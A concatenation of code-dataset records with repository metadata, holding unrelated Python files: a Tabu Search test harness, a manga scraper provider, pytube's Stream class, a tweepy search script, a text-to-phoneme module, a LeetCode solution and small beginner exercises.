222685f51ec56d50a935508b87c66af2db694e28 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322005203.py | dc127637a831840c9f18cc1ca90688e8540b41dc | [] | no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
numberOfTests = 1000
tabuIteration = '1000'
tabuDuration = '10'
numberOfCities = '50'
final_solution = []
list_coverage = []
local_minimum = []
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
result = stdout
result = re.sub(r'\s', ' ', str(result))
solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
final_solution.append(int(solution))
coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
if coverage != []:
coverage = int(coverage[0])+ 1
local_minimum.append(int(solution))
else:
coverage = int(tabuIteration)
number_of_solution_before_coverage = coverage
list_coverage.append(coverage)
print('best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(solution, coverage, number_of_solution_before_coverage))
time.sleep( 1 )
print("Summary:")
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {max(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
print(f'') | [
"farzam.mirmoeini@gmail.com"
] | farzam.mirmoeini@gmail.com |
f3e047c6d5a259010568b73807716e530bc4005d | 3481023b43028c5ee9520a8be0978e914bdcb548 | /manga_py/providers/mang_as.py | 27238087ebc8dca9f1a40bcd29d161ac214b695c | [
"MIT"
] | permissive | manga-py/manga-py | 18f6818d8efc96c3e69efee7dff3f3d6c773e32a | 0db97123acab1f2fb99e808b0ba54db08977e5c8 | refs/heads/stable_1.x | 2023-08-20T03:04:06.373108 | 2023-04-16T08:28:15 | 2023-04-16T08:28:15 | 98,638,892 | 444 | 56 | MIT | 2023-07-27T13:21:40 | 2017-07-28T10:27:43 | Python | UTF-8 | Python | false | false | 1,185 | py | from sys import stderr
from manga_py.provider import Provider
from .helpers.std import Std
class MangAs(Provider, Std):
def get_chapter_index(self) -> str:
idx = self.re.search('/manga/[^/]+/([^/]+)', self.chapter).group(1)
return idx.replace('.', '-')
def get_content(self):
return self._get_content('{}/manga/{}')
def get_manga_name(self) -> str:
return self._get_name('/manga/([^/]+)')
def get_chapters(self):
return self._elements('.chapter-title-rtl > a')
def get_files(self):
content = self.http_get(self.chapter)
self.http().referer = self.chapter
items = self.re.search(r'var\s+pages\s*=\s*(\[.+\])', content)
if not items:
self.log('Images not found!', file=stderr)
return []
n = self.normalize_uri
items = self.json.loads(items.group(1))
return [n(i.get('page_image')) for i in items]
def prepare_cookies(self):
self._base_cookies(self.get_url())
def get_cover(self) -> str:
return self._cover_from_content('.boxed > img.img-responsive')
def book_meta(self) -> dict:
pass
main = MangAs
| [
"sttv-pc@mail.ru"
] | sttv-pc@mail.ru |
00d37ef5a44949f4d28a68655229c1733d6e2627 | da687718aa8ce62974090af63d25e057262e9dfe | /cap08-numeros/03_random.py | db2785183561b4bbf0cdc15b8b4c5a6a79ce731f | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #!/usr/bin/env python3
# importando o modulo random
import random
# random numbers
print(random.random()) # imprime um numero entre 0 e 1
decider = random.randrange(2) # 0 OU 1
if decider == 0:
print('HEADS')
else:
print('TAILS')
print(f'Decider is:', decider)
print("You rolled a " + str(random.randrange(1, 7)))
megaSena = random.sample(range(61), 6) # range de 0 a 60, gerando 6 numeros
print(megaSena)
# random choices
possiblePets = ['cat', 'dog', 'fish']
print(random.choice(possiblePets))
cards = ['Jack', 'Queen', 'Ace', 'King']
random.shuffle(cards)
print(cards) | [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
02c87dfe25889db419238131737049196a75d3fd | f36999827ad651b5ff2fd4b20d7c0245d5f30cfe | /twi_search_sht_01.py | 7912ed0564577b9c68a69549a85199199c5ca20f | [] | no_license | axuaxu/twi-src | cbcfe6891539d568c9ecece0db531984d7552094 | 3347c7d4ebd94c3399a7427427745fa73fe8463e | refs/heads/master | 2021-07-11T09:07:58.013503 | 2017-10-15T17:15:10 | 2017-10-15T17:15:10 | 105,077,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import tweepy
from credentials import *
import sys
#import jsonpickle
import os
import codecs
import datetime
import json
auth = tweepy.AppAuthHandler(consumer_key, consumer_secret)
#auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True,
wait_on_rate_limit_notify=True)
if (not api):
print ("Can't Authenticate")
sys.exit(-1)
def TwiShort(out,shtFile):
outF = open(out,'r')
sFile = open(shtFile,'w')
print shtFile
for twi in outF:
shtStr = twi._json.retweet_count
print shtStr
sFile.write(shtStr)
def TwiSearch(que,fName,sinceId,max_id):
searchQuery = que
# this is what we're searching for
maxTweets = 10000000 # Some arbitrary large number
tweetsPerQry = 100 # this is the max the API permits
# We'll store the tweets in a text file.
# If results from a specific ID onwards are reqd, set since_id to that ID.
# else default to no lower limit, go as far back as API allows
# If results only below a specific ID are, set max_id to that ID.
# else default to no upper limit, start from the most recent tweet matching the search query.
tweetCount = 0
print("Downloading max {0} tweets".format(maxTweets))
with open(fName, 'w') as f:
while tweetCount < maxTweets:
try:
if (max_id <= 0):
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry)
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
since_id=sinceId)
else:
if (not sinceId):
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1))
else:
new_tweets = api.search(q=searchQuery, count=tweetsPerQry,
max_id=str(max_id - 1),
since_id=sinceId)
if not new_tweets:
print("No more tweets found")
break
for tweet in new_tweets:
# f.write(jsonpickle.encode(tweet._json, unpicklable=False) +
# '\n')
f.write(str(tweet._json)+'\n')
print "\nid "+str(tweet._json['id'])
print "\nretwi "+str(tweet._json['retweet_count'])
fav = tweet._json.favorite_count
tweetCount += len(new_tweets)
print("\nDownloaded {0} tweets".format(tweetCount))
max_id = new_tweets[-1].id
except tweepy.TweepError as e:
# Just exit if any error
print("some error : " + str(e))
break
print ("Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName))
logStr = "Downloaded {0} tweets, Saved to {1}".format(tweetCount, fName)
return logStr
#print "\nshortFile"+shtFile
#pass
#que = '#georgiaokeeffe'
#outName = 'tweets-01.txt'
sinceId = None
max_id = -1L
#TwiSearch(que,outName,sinceId,max_id)
now = datetime.datetime.now()
timestr = str(now).replace(' ','-').replace(':','-')
#print str(now)+'\n'+timestr+'\n'+timestr[:19]
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
count = 100
cdir = '.\\status-query'
srcDown = '.\\status-query-down'
logFile = cdir+'\\log-que-'+timestr[:16]+'.txt'
logStr = ""
#maxid = 9999999999999999999
shtFile=""
for que in ftwi:
#maxid = getMaxID(que,cdir,srcDown,sinceId,max_id)
#print "twi_id:"+twi_id+" maxid:"+str(maxid)
out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
out = out.replace('\r\n','')
print "\ninput: "+ que+"\noutput: "+out
logStr = logStr+"\ninput: "+ que+"\noutput: "+out
logStr = logStr+TwiSearch(que,out,sinceId,max_id)
logF = open(logFile,'w')
logF.write(logStr)
twi = "twi_query_list.txt"
#fout = codecs.open(out,"w",encoding="utf-8")
ftwi = codecs.open(twi,'r',encoding="utf-8")
for que in ftwi:
out = cdir+'\\que-'+que+'-'+timestr[:16]+'.txt'
out = out.replace('\r\n','')
shtFile = out.replace('que-','sht-que-')
#tShort = TwiShort(out,shtFile)
#fout = codecs.open(out,"w",encoding="utf-8")
#fout.write(tstatus)
| [
"axu0110@gmail.com"
] | axu0110@gmail.com |
f5eb98bcd90970ce6adcab0d5a97253af6e5eec1 | afedbd0af6dff5a4fca8bab92e2a5574d9e541ca | /venv/lib/python3.5/site-packages/pytube/streams.py | bb3d1290a3817b2494579370fb2dd5a988b350ba | [] | no_license | wagolemusa/web_scrapping | d847b71ded82f471f28daed6083667eef450b21d | 794d24d1492d8ebeb9ffab16d1b185c6cab33c74 | refs/heads/master | 2022-12-31T22:31:02.407179 | 2020-10-21T09:27:39 | 2020-10-21T09:27:39 | 305,924,696 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,621 | py | # -*- coding: utf-8 -*-
"""
This module contains a container for stream manifest data.
A container object for the media stream (video only / audio only / video+audio
combined). This was referred to as ``Video`` in the legacy pytube version, but
has been renamed to accommodate DASH (which serves the audio and video
separately).
"""
from __future__ import absolute_import
import io
import logging
import os
import pprint
from pytube import extract
from pytube import request
from pytube.helpers import safe_filename
from pytube.itags import get_format_profile
logger = logging.getLogger(__name__)
class Stream(object):
"""Container for stream manifest data."""
def __init__(self, stream, player_config_args, monostate):
"""Construct a :class:`Stream <Stream>`.
:param dict stream:
The unscrambled data extracted from YouTube.
:param dict player_config_args:
The data object containing video media data like title and
keywords.
:param dict monostate:
Dictionary of data shared across all instances of
:class:`Stream <Stream>`.
"""
# A dictionary shared between all instances of :class:`Stream <Stream>`
# (Borg pattern).
self._monostate = monostate
self.abr = None # average bitrate (audio streams only)
self.fps = None # frames per second (video streams only)
self.itag = None # stream format id (youtube nomenclature)
self.res = None # resolution (e.g.: 480p, 720p, 1080p)
self.url = None # signed download url
self._filesize = None # filesize in bytes
self.mime_type = None # content identifier (e.g.: video/mp4)
self.type = None # the part of the mime before the slash
self.subtype = None # the part of the mime after the slash
self.codecs = [] # audio/video encoders (e.g.: vp8, mp4a)
self.audio_codec = None # audio codec of the stream (e.g.: vorbis)
self.video_codec = None # video codec of the stream (e.g.: vp8)
# Iterates over the key/values of stream and sets them as class
# attributes. This is an anti-pattern and should be removed.
self.set_attributes_from_dict(stream)
# Additional information about the stream format, such as resolution,
# frame rate, and whether the stream is live (HLS) or 3D.
self.fmt_profile = get_format_profile(self.itag)
# Same as above, except for the format profile attributes.
self.set_attributes_from_dict(self.fmt_profile)
# The player configuration which contains information like the video
# title.
# TODO(nficano): this should be moved to the monostate.
self.player_config_args = player_config_args
# 'video/webm; codecs="vp8, vorbis"' -> 'video/webm', ['vp8', 'vorbis']
self.mime_type, self.codecs = extract.mime_type_codec(self.type)
# 'video/webm' -> 'video', 'webm'
self.type, self.subtype = self.mime_type.split("/")
# ['vp8', 'vorbis'] -> video_codec: vp8, audio_codec: vorbis. DASH
# streams return NoneType for audio/video depending.
self.video_codec, self.audio_codec = self.parse_codecs()
def set_attributes_from_dict(self, dct):
"""Set class attributes from dictionary items.
:rtype: None
"""
for key, val in dct.items():
setattr(self, key, val)
@property
def is_adaptive(self):
"""Whether the stream is DASH.
:rtype: bool
"""
# if codecs has two elements (e.g.: ['vp8', 'vorbis']): 2 % 2 = 0
# if codecs has one element (e.g.: ['vp8']) 1 % 2 = 1
return len(self.codecs) % 2
@property
def is_progressive(self):
"""Whether the stream is progressive.
:rtype: bool
"""
return not self.is_adaptive
@property
def includes_audio_track(self):
"""Whether the stream only contains audio.
:rtype: bool
"""
if self.is_progressive:
return True
return self.type == "audio"
@property
def includes_video_track(self):
"""Whether the stream only contains video.
:rtype: bool
"""
if self.is_progressive:
return True
return self.type == "video"
def parse_codecs(self):
"""Get the video/audio codecs from list of codecs.
Parse a variable length sized list of codecs and returns a
constant two element tuple, with the video codec as the first element
and audio as the second. Returns None if one is not available
(adaptive only).
:rtype: tuple
:returns:
A two element tuple with audio and video codecs.
"""
video = None
audio = None
if not self.is_adaptive:
video, audio = self.codecs
elif self.includes_video_track:
video = self.codecs[0]
elif self.includes_audio_track:
audio = self.codecs[0]
return video, audio
@property
def filesize(self):
"""File size of the media stream in bytes.
:rtype: int
:returns:
Filesize (in bytes) of the stream.
"""
if self._filesize is None:
headers = request.get(self.url, headers=True)
self._filesize = int(headers["content-length"])
return self._filesize
@property
def title(self):
"""Get title of video
:rtype: str
:returns:
Youtube video title
"""
player_config_args = self.player_config_args or {}
if "title" in player_config_args:
return player_config_args["title"]
details = self.player_config_args.get("player_response", {},).get(
"videoDetails", {}
)
if "title" in details:
return details["title"]
return "Unknown YouTube Video Title"
@property
def default_filename(self):
"""Generate filename based on the video title.
:rtype: str
:returns:
An os file system compatible filename.
"""
filename = safe_filename(self.title)
return "{filename}.{s.subtype}".format(filename=filename, s=self)
def download(self, output_path=None, filename=None, filename_prefix=None):
"""Write the media stream to disk.
:param output_path:
(optional) Output path for writing media file. If one is not
specified, defaults to the current working directory.
:type output_path: str or None
:param filename:
(optional) Output filename (stem only) for writing media file.
If one is not specified, the default filename is used.
:type filename: str or None
:param filename_prefix:
(optional) A string that will be prepended to the filename.
For example a number in a playlist or the name of a series.
If one is not specified, nothing will be prepended
This is seperate from filename so you can use the default
filename but still add a prefix.
:type filename_prefix: str or None
:rtype: str
"""
output_path = output_path or os.getcwd()
if filename:
safe = safe_filename(filename)
filename = "{filename}.{s.subtype}".format(filename=safe, s=self)
filename = filename or self.default_filename
if filename_prefix:
filename = "{prefix}{filename}".format(
prefix=safe_filename(filename_prefix), filename=filename,
)
# file path
fp = os.path.join(output_path, filename)
bytes_remaining = self.filesize
logger.debug(
"downloading (%s total bytes) file to %s", self.filesize, fp,
)
with open(fp, "wb") as fh:
for chunk in request.get(self.url, streaming=True):
# reduce the (bytes) remainder by the length of the chunk.
bytes_remaining -= len(chunk)
# send to the on_progress callback.
self.on_progress(chunk, fh, bytes_remaining)
self.on_complete(fh)
return fp
def stream_to_buffer(self):
"""Write the media stream to buffer
:rtype: io.BytesIO buffer
"""
buffer = io.BytesIO()
bytes_remaining = self.filesize
logger.debug(
"downloading (%s total bytes) file to BytesIO buffer",
self.filesize,
)
for chunk in request.get(self.url, streaming=True):
# reduce the (bytes) remainder by the length of the chunk.
bytes_remaining -= len(chunk)
# send to the on_progress callback.
self.on_progress(chunk, buffer, bytes_remaining)
self.on_complete(buffer)
return buffer
def on_progress(self, chunk, file_handler, bytes_remaining):
"""On progress callback function.
This function writes the binary data to the file, then checks if an
additional callback is defined in the monostate. This is exposed to
allow things like displaying a progress bar.
:param str chunk:
Segment of media file binary data, not yet written to disk.
:param file_handler:
The file handle where the media is being written to.
:type file_handler:
:py:class:`io.BufferedWriter`
:param int bytes_remaining:
The delta between the total file size in bytes and amount already
downloaded.
:rtype: None
"""
file_handler.write(chunk)
logger.debug(
"download progress\n%s",
pprint.pformat(
{
"chunk_size": len(chunk),
"bytes_remaining": bytes_remaining,
},
indent=2,
),
)
on_progress = self._monostate["on_progress"]
if on_progress:
logger.debug("calling on_progress callback %s", on_progress)
on_progress(self, chunk, file_handler, bytes_remaining)
def on_complete(self, file_handle):
"""On download complete handler function.
:param file_handle:
The file handle where the media is being written to.
:type file_handle:
:py:class:`io.BufferedWriter`
:rtype: None
"""
logger.debug("download finished")
on_complete = self._monostate["on_complete"]
if on_complete:
logger.debug("calling on_complete callback %s", on_complete)
on_complete(self, file_handle)
def __repr__(self):
"""Printable object representation.
:rtype: str
:returns:
A string representation of a :class:`Stream <Stream>` object.
"""
# TODO(nficano): this can probably be written better.
parts = ['itag="{s.itag}"', 'mime_type="{s.mime_type}"']
if self.includes_video_track:
parts.extend(['res="{s.resolution}"', 'fps="{s.fps}fps"'])
if not self.is_adaptive:
parts.extend(
['vcodec="{s.video_codec}"', 'acodec="{s.audio_codec}"']
)
else:
parts.extend(['vcodec="{s.video_codec}"'])
else:
parts.extend(['abr="{s.abr}"', 'acodec="{s.audio_codec}"'])
parts = " ".join(parts).format(s=self)
return "<Stream: {parts}>".format(parts=parts)
| [
"homiemusa@gmail.com"
] | homiemusa@gmail.com |
e87e47c309e8b06fd93c6d7cc597f5ad45defb4c | a152297e3e61f99a6e48570f39a92f5bae44bfce | /read_csv_dtype.py | 533219d206b37a32af0682be7909bd61c27208a4 | [] | no_license | Syaza2007/pandas | 5ce73f2a15425619344ea7d6d69341bea4716fe3 | 3096bccbc58d4bb3cb1e5a62bb759aef55a97983 | refs/heads/master | 2020-06-09T02:58:15.913925 | 2017-09-12T17:08:34 | 2017-09-12T17:08:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | df = pd.read_csv(inFile, dtype={'state':object,'county':object,'tract':object}) | [
"daniel.martin.sheehan@gmail.com"
] | daniel.martin.sheehan@gmail.com |
f7793911f3d5f2ab90020e6656f60bbb34963128 | 9f594f95fabf672df31c451ef758f1dd979d20e4 | /agsci/seo/__init__.py | 208daa14b09f51282fb42de2b027d9d6443ba431 | [] | no_license | tsimkins/agsci.seo | 0d37fea8f8a736a5109e050bbb82e90e4233a0a3 | 39b31b5df21961cbd278851dc3a53f71937fa84a | refs/heads/master | 2020-12-30T10:36:47.454391 | 2018-06-18T14:52:43 | 2018-06-18T14:52:43 | 26,601,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | from Products.CMFCore.utils import getToolByName
from Products.PythonScripts.Utility import allow_module
from zope.i18nmessageid import MessageFactory
from DateTime import DateTime
seoMessageFactory = MessageFactory('agsci.seo')
allow_module('agsci.seo')
exclude_types = [
'Cardinality Constraint',
'Content Reference',
'FSDCommittee',
'FSDCommitteeMembership',
'FSDCommitteesFolder',
'FSDCourse',
'FSDDepartment',
'FSDDepartmentalMembership',
'FSDFacultyStaffDirectoryTool',
'FSDPersonGrouping',
'FSDSpecialtiesFolder',
'FSDSpecialty',
'FSDSpecialtyInformation',
'FieldsetEnd',
'FieldsetFolder',
'FieldsetStart',
'FormBooleanField',
'FormConfirmationPage',
'FormMailerAdapter',
'FormMultiSelectionField',
'FormRichLabelField',
'FormSaveDataAdapter',
'FormSelectionField',
'FormStringField',
'FormTextField',
'FormThanksPage',
'Interface Constraint',
'Inverse Implicator',
'Link',
'Newsletter',
'Relations Library',
'Ruleset Collection',
'Ruleset',
'TalkEvent',
'Type Constraint',
]
def initialize(context):
pass | [
"trs22@psu.edu"
] | trs22@psu.edu |
20e5c44e7c4bffe2d3c42c00cb01c58c6a6f4c9f | d886bbef4caafefc1796e77d41d7c7fdddbb4794 | /mb/__init__.py | 22b50fb108b7696e26f4c3bf7d0d376a66a26c1f | [] | no_license | coryshain/pyModelBlocks | 4864a23e4e8452340797fdbc60338ad5e579d14f | ba25bf5d5279962675763f3c30b6452dbae15d25 | refs/heads/master | 2020-08-26T21:30:55.126202 | 2019-11-11T21:12:38 | 2019-11-11T21:12:38 | 217,154,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from mb.util.general import *
from mb.core.general.core import *
from mb.core.general.text import *
from mb.core.general.table import *
from mb.core.general.tree import *
from mb.core.parsing.core import *
from mb.core.regression import *
from mb.core.regression.lmer import *
from mb.core.regression.cdr import *
from mb.external_resources.ptb import *
from mb.external_resources.natstor import *
| [
"cory.shain@gmail.com"
] | cory.shain@gmail.com |
f9216e0b85abadad6d47ea519c87ced608c69d2a | 897802abf4ee5c7267de3eb5e321cc931898e2f6 | /python/python/songTian/part0_base/week02/c231_z_draw/__init__.py | 3186d069bc19e4cc6cb986cd688cddf78bfa3f9b | [] | no_license | aojie654/codes_store | 0527c7a7729b472e8fd2fd67af462cf857970633 | ed71b6266b2d2b5ddefadcb958f17695fb9db6cf | refs/heads/master | 2021-07-15T17:04:33.591673 | 2021-07-03T14:42:30 | 2021-07-03T14:42:30 | 132,343,733 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | py | import turtle
# turtle.left(45)
turtle.penup()
turtle.bk(200)
turtle.pendown()
turtle.fd(150)
turtle.right(135)
turtle.fd(300)
turtle.left(135)
turtle.fd(150)
turtle.penup()
turtle.goto(100,150)
turtle.pendown()
turtle.circle(50,360)
| [
"aojie654@live.cn"
] | aojie654@live.cn |
f09ddbf128cad3f9efabae34ddc77bf3a77764f0 | 078918048099dfa2454cfac2d449ea3d77fbec55 | /452-minimum-number-of-arrows-to-burst-balloons.py | 370660e7078631a2893e6cedf203d00f19083f7a | [] | no_license | DmitryVlaznev/leetcode | 931784dcc4b465eebda7d22311f5bf5fa879f068 | b2a2afdfc725330545c9a2869fefc7d45ec594bc | refs/heads/master | 2023-06-10T05:42:34.992220 | 2023-06-05T09:54:10 | 2023-06-05T09:54:30 | 241,064,389 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,594 | py | # 452. Minimum Number of Arrows to Burst Balloons
# There are some spherical balloons spread in two-dimensional space. For
# each balloon, provided input is the start and end coordinates of the
# horizontal diameter. Since it's horizontal, y-coordinates don't
# matter, and hence the x-coordinates of start and end of the diameter
# suffice. The start is always smaller than the end.
# An arrow can be shot up exactly vertically from different points along
# the x-axis. A balloon with xstart and xend bursts by an arrow shot at
# x if xstart ≤ x ≤ xend. There is no limit to the number of arrows that
# can be shot. An arrow once shot keeps traveling up infinitely.
# Given an array points where points[i] = [xstart, xend], return the
# minimum number of arrows that must be shot to burst all balloons.
# Example 1:
# Input: points = [[10,16],[2,8],[1,6],[7,12]]
# Output: 2
# Explanation: One way is to shoot one arrow for example at x = 6 (bursting the balloons [2,8] and [1,6]) and another arrow at x = 11 (bursting the other two balloons).
# Example 2:
# Input: points = [[1,2],[3,4],[5,6],[7,8]]
# Output: 4
# Example 3:
# Input: points = [[1,2],[2,3],[3,4],[4,5]]
# Output: 2
# Example 4:
# Input: points = [[1,2]]
# Output: 1
# Example 5:
# Input: points = [[2,3],[2,3]]
# Output: 1
# Constraints:
# 0 <= points.length <= 104
# points.length == 2
# -231 <= xstart < xend <= 231 - 1
from typing import List
from utils import checkValue
class Solution:
def findMinArrowShots(self, points: List[List[int]]) -> int:
if len(points) < 2: return len(points)
import functools
def comparator(a, b):
if a[0] < b[0]: return -1
if a[0] > b[0]: return 1
if a[1] > b[1]: return -1
if a[1] < b[1]: return 1
return 0
points.sort(key=functools.cmp_to_key(comparator))
arrows, intersection = 0, points[0]
for i in range(1, len(points)):
p = points[i]
if p[0] <= intersection[1]:
intersection[0] = max(intersection[0], p[0])
intersection[1] = min(intersection[1], p[1])
else:
arrows += 1
intersection = p
return arrows + 1
t = Solution()
checkValue(2 , t.findMinArrowShots([[10,16],[2,8],[1,6],[7,12]]))
checkValue(4 , t.findMinArrowShots([[1,2],[3,4],[5,6],[7,8]]))
checkValue(2 , t.findMinArrowShots([[1,2],[2,3],[3,4],[4,5]]))
checkValue(1 , t.findMinArrowShots([[1,2]]))
checkValue(0 , t.findMinArrowShots([]))
checkValue(1 , t.findMinArrowShots([[2,3],[2,3]])) | [
"dmitry.vlaznev@datadvance.net"
] | dmitry.vlaznev@datadvance.net |
e85356b804f2734ce5dbfaf2d8f1d7ce277df17f | 78743e6b4f07a466d9b43e462f2d687443bf8538 | /phkit/english/__init__.py | 3ad48a32dab7797f62fdaa4cf8cbdc65b881d773 | [
"MIT"
] | permissive | tomguluson92/phkit | 9bac08019cc9f742ac82fa24a51e33448bb735da | ff6cd9114aa8a3737c05f0d4bba5d4da766770a0 | refs/heads/master | 2022-10-04T19:13:03.829071 | 2020-06-01T03:10:59 | 2020-06-01T03:10:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,789 | py | """
## english
from https://github.com/keithito/tacotron "
Cleaners are transformations that run over the input text at both training and eval time.
Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners"
hyperparameter. Some cleaners are English-specific. You'll typically want to use:
1. "english_cleaners" for English text
2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using
the Unidecode library (https://pypi.python.org/pypi/Unidecode)
3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update
the symbols in symbols.py to match your data).
"""
import re
import random
from . import cleaners
from .symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def get_arpabet(word, dictionary):
word_arpabet = dictionary.lookup(word)
if word_arpabet is not None:
return "{" + word_arpabet[0] + "}"
else:
return word
def text_to_sequence(text, cleaner_names, dictionary=None, p_arpabet=1.0):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
dictionary: arpabet class with arpabet dictionary
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
space = _symbols_to_sequence(' ')
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
clean_text = _clean_text(text, cleaner_names)
if dictionary is not None:
clean_text = [get_arpabet(w, dictionary)
if random.random() < p_arpabet else w
for w in clean_text.split(" ")]
for i in range(len(clean_text)):
t = clean_text[i]
if t.startswith("{"):
sequence += _arpabet_to_sequence(t[1:-1])
else:
sequence += _symbols_to_sequence(t)
sequence += space
else:
sequence += _symbols_to_sequence(clean_text)
break
clean_text = _clean_text(text, cleaner_names)
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
# remove trailing space
sequence = sequence[:-1] if sequence[-1] == space[0] else sequence
return sequence
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = []
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result.append(s)
result = ''.join(result)
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
return s in _symbol_to_id and s is not '_' and s is not '~'
| [
"kqhyj@163.com"
] | kqhyj@163.com |
283beabf89838afcd66883c346c7a93bfba3840a | 89cd8b77ad5171c336cc60b2133fe6468a6cb53f | /Module01_CZ/day6_data_structure/04-代码/day6/102_元组.py | 2a44d5053791d093d0eafa1f4fa309c5bf6d9cd2 | [
"MIT"
] | permissive | fenglihanxiao/Python | 75178f6b6b0c53345e1ed54226ea645216572d6c | 872baf3a3a5ee42740161152605ca2b1ddf4cd30 | refs/heads/master | 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | """
演示元组
"""
tuple1 = (1,2,3,"itcast","黑马程序员",True,False)
print(tuple1)
tuple2 = (100,)
print(tuple2)
# tuple3 = ("itcast") #不是元组
# print(type(tuple3))
# print(tuple1[4])
# tuple1[4] = "heima"
for data in tuple1:
print(data) | [
"fenglihanxiao@qq.com"
] | fenglihanxiao@qq.com |
9b371d5b80d4dc46d3a0bcdd75543261fb3c344c | 29d09c634ffdd8cab13631d62bc6e3ad00df49bf | /Algorithm/swexpert/1234_비밀번호.py | d93923dd1ba591415e9c6fd6a7dc893fdd765f2b | [] | no_license | kim-taewoo/TIL_PUBLIC | f1d32c3b4f46344c1c99f02e95cc6d2a888a0374 | ae86b542f8b1805b5dd103576d6538e3b1f5b9f4 | refs/heads/master | 2021-09-12T04:22:52.219301 | 2021-08-28T16:14:11 | 2021-08-28T16:14:11 | 237,408,159 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | T = 10
for t in range(1, T+1):
n, s = input().split()
n = int(n)
s = list(s)
while True:
flag = False
i = 1
while i < n:
if s[i-1] == s[i]:
flag = True
s = s[:i-1] + s[i+1:]
n -= 2
else:
i += 1
if not flag:
break
result = "".join(s)
print("#{} {}".format(t, result)) | [
"acoustic0419@gmail.com"
] | acoustic0419@gmail.com |
